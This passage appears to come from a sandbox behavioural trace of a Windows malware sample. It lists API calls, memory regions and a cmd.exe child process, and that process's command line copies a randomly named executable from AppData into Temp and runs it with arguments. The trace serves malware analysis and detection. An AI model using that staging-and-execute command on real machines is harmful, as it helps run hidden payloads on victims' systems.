(in: IcmpHandle=0x1f8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x18f920, DestinationAddress=0xbf55e0, RequestData=0x1f4830, RequestSize=0x20, RequestOptions=0x18f8d0, ReplyBuffer=0x1febb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1febb0) returned 0x1 [0112.051] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x18fda4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0112.051] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x18f8a8, nSize=0x0, Arguments=0x18f8a4 | out: lpBuffer=" Q\x1f") returned 0x10 [0112.051] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x1f5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0112.051] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.051] _write (in: _FileHandle=1, _Buf=0x1f5120*, _MaxCharCount=0x10 | out: _Buf=0x1f5120*) returned 16 [0112.051] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.051] LocalFree (hMem=0x1f5120) returned 0x0 [0112.051] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer="\x10<\x1f") returned 0x9 [0112.051] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x1f3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0112.051] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.051] _write (in: _FileHandle=1, _Buf=0x1f3c10*, _MaxCharCount=0x9 | out: _Buf=0x1f3c10*) returned 9 [0112.051] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.051] LocalFree (hMem=0x1f3c10) returned 0x0 [0112.051] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x18f8ac, nSize=0x0, Arguments=0x18f8a8 | out: lpBuffer=" \x8f\x1f") returned 0x2 [0112.051] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x1f8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0112.052] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.052] _write (in: _FileHandle=1, _Buf=0x1f8f20*, _MaxCharCount=0x2 | out: _Buf=0x1f8f20*) returned 2 [0112.052] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.052] LocalFree (hMem=0x1f8f20) returned 0x0 [0112.052] getnameinfo (in: pSockaddr=0xbf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x18f870, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0112.052] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x18f840, nSize=0x0, Arguments=0x18f83c | out: lpBuffer="\xd0\x14\x20") returned 0x56 [0112.052] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x2014d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0112.052] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.052] _write (in: _FileHandle=1, _Buf=0x2014d0*, _MaxCharCount=0x56 | out: _Buf=0x2014d0*) returned 86 [0112.052] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.052] LocalFree (hMem=0x2014d0) returned 0x0 [0112.052] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x18f850, nSize=0x0, Arguments=0x18f84c | out: lpBuffer="\xe8\x14\x20") returned 0x61 [0112.052] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x2014e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0112.052] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0112.052] _write (in: _FileHandle=1, _Buf=0x2014e8*, _MaxCharCount=0x61 | out: _Buf=0x2014e8*) returned 97 [0112.052] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0112.052] LocalFree (hMem=0x2014e8) returned 0x0 [0112.052] IcmpCloseHandle (IcmpHandle=0x1f8b40) returned 1 [0112.251] LocalFree (hMem=0x1f4830) returned 0x0 [0112.251] LocalFree (hMem=0x1febb0) returned 0x0 [0112.251] WSACleanup () returned 0 [0112.339] exit (_Code=0) Thread: id = 64 os_tid = 0xd20 Thread: id = 65 os_tid = 0xd24 Thread: id = 66 os_tid = 0xd28 Process: id = "39" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6689 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6690 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6691 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6692 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 6693 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 6694 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6695 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6696 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6697 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 6698 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 6699 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6700 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6701 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6702 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 6703 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 6704 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 6705 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6706 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 6707 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6708 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6709 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6710 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 6711 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6712 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 6713 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 6714 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6715 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6716 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 6717 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 6718 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 6719 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 6720 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 6721 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 6722 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 6733 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 67 os_tid = 0xd30 [0111.295] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f8a4 | out: lpSystemTimeAsFileTime=0x26f8a4*(dwLowDateTime=0x805761c0, dwHighDateTime=0x1d440a9)) [0111.295] GetCurrentProcessId () returned 0xd2c [0111.295] GetCurrentThreadId () returned 0xd30 [0111.295] GetTickCount () returned 0x26a56 [0111.295] QueryPerformanceCounter (in: lpPerformanceCount=0x26f89c | out: lpPerformanceCount=0x26f89c*=16808387378) returned 1 [0111.295] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0111.295] __set_app_type (_Type=0x1) [0111.295] __p__fmode () returned 0x76b331f4 [0111.295] __p__commode () returned 0x76b331fc [0111.295] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0111.296] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0111.296] GetCurrentThreadId () returned 0xd30 [0111.296] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd30) returned 0x38 [0111.296] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0111.296] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0111.296] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.296] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.296] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f834 | out: phkResult=0x26f834*=0x0) returned 0x2 [0111.296] VirtualQuery (in: lpAddress=0x26f86b, lpBuffer=0x26f804, dwLength=0x1c | out: lpBuffer=0x26f804*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.296] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f804, dwLength=0x1c | out: lpBuffer=0x26f804*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0111.296] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f804, dwLength=0x1c | out: lpBuffer=0x26f804*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0111.296] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f804, dwLength=0x1c | out: lpBuffer=0x26f804*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.296] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f804, dwLength=0x1c | out: lpBuffer=0x26f804*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0111.296] GetConsoleOutputCP () returned 0x1b5 [0111.296] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.297] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0111.297] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.297] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0111.297] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.297] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.297] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.297] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.297] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.297] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.297] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.297] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0111.297] GetEnvironmentStringsW () returned 0x3e0388* [0111.298] FreeEnvironmentStringsW (penv=0x3e0388) returned 1 [0111.298] GetEnvironmentStringsW () returned 0x3e0388* [0111.298] FreeEnvironmentStringsW (penv=0x3e0388) returned 1 [0111.298] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7a4 | out: phkResult=0x26e7a4*=0x40) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x38, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x1, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x1, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x0, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x40, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x40, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x40, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegCloseKey (hKey=0x40) returned 0x0 [0111.298] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7a4 | out: phkResult=0x26e7a4*=0x40) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x40, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x1, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x1, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x0, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x9, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x4, lpData=0x26e7b0*=0x9, lpcbData=0x26e7a8*=0x4) returned 0x0 [0111.298] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7ac, lpData=0x26e7b0, lpcbData=0x26e7a8*=0x1000 | out: lpType=0x26e7ac*=0x0, lpData=0x26e7b0*=0x9, lpcbData=0x26e7a8*=0x1000) returned 0x2 [0111.298] RegCloseKey (hKey=0x40) returned 0x0 [0111.299] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886358 [0111.299] srand (_Seed=0x5b886358) [0111.299] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0111.299] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0111.299] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.299] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1ae8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0111.299] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0111.299] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.299] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.299] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0111.299] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0111.299] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0111.299] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0111.299] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0111.299] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0111.299] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0111.299] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0111.299] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0111.300] GetEnvironmentStringsW () returned 0x3e24d8* [0111.300] FreeEnvironmentStringsW (penv=0x3e24d8) returned 1 [0111.300] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.300] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.300] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0111.300] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0111.300] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0111.300] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0111.300] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0111.300] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0111.300] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0111.300] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0111.300] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f570 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.300] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f570, lpFilePart=0x26f56c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f56c*="Desktop") returned 0x18 [0111.300] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0111.300] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f2ec | out: lpFindFileData=0x26f2ec) returned 0x3e0b68 [0111.300] FindClose (in: hFindFile=0x3e0b68 | out: hFindFile=0x3e0b68) returned 1 [0111.300] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f2ec | out: lpFindFileData=0x26f2ec) returned 0x3e0b68 [0111.300] FindClose (in: hFindFile=0x3e0b68 | out: hFindFile=0x3e0b68) returned 1 [0111.301] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f2ec | out: lpFindFileData=0x26f2ec) returned 0x3e0b68 [0111.301] FindClose (in: hFindFile=0x3e0b68 | out: hFindFile=0x3e0b68) returned 1 [0111.301] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0111.301] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0111.301] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0111.301] GetEnvironmentStringsW () returned 0x3e0388* [0111.301] FreeEnvironmentStringsW (penv=0x3e0388) returned 1 [0111.301] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.301] GetConsoleOutputCP () returned 0x1b5 [0111.301] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.302] GetUserDefaultLCID () returned 0x409 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f6b0, cchData=128 | out: lpLCData="0") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f6b0, cchData=128 | out: lpLCData="0") returned 2 [0111.302] GetLocaleInfoW (in: Locale=0x409, 